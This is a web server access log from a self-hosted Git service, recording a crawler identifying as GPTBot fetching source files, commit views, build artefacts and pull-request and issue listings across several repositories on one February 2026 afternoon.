"/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12036] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12030] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12029] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" -[17/Feb/2026:17:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" -[17/Feb/2026:17:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:17:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:17:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9935] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" -[17/Feb/2026:17:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12028] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12028] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12029] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:57:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13486] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" -[17/Feb/2026:17:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12030] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12031] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fgold_monitor_full.pkg" [Client 74.7.227.38] [Length 23819] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:17:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:17:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:17:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:17:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9931] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:17:57:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:17:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13312] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:17:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:17:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:17:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:17:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:17:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9943] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:17:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11019] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9962] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:17:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/storage.py?display=source" [Client 74.7.227.38] [Length 12014] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" -[17/Feb/2026:17:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py?display=source" [Client 74.7.227.38] [Length 18303] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" -[17/Feb/2026:17:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md?display=source" [Client 74.7.227.38] [Length 12783] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:57:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv?display=rendered" [Client 74.7.227.38] [Length 11337] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" -[17/Feb/2026:17:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fWRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 23099] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:17:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:17:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:17:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:17:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:17:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:17:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12060] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12059] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12060] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17051] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:17:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17027] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:17:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:17:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:17:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:17:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17051] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 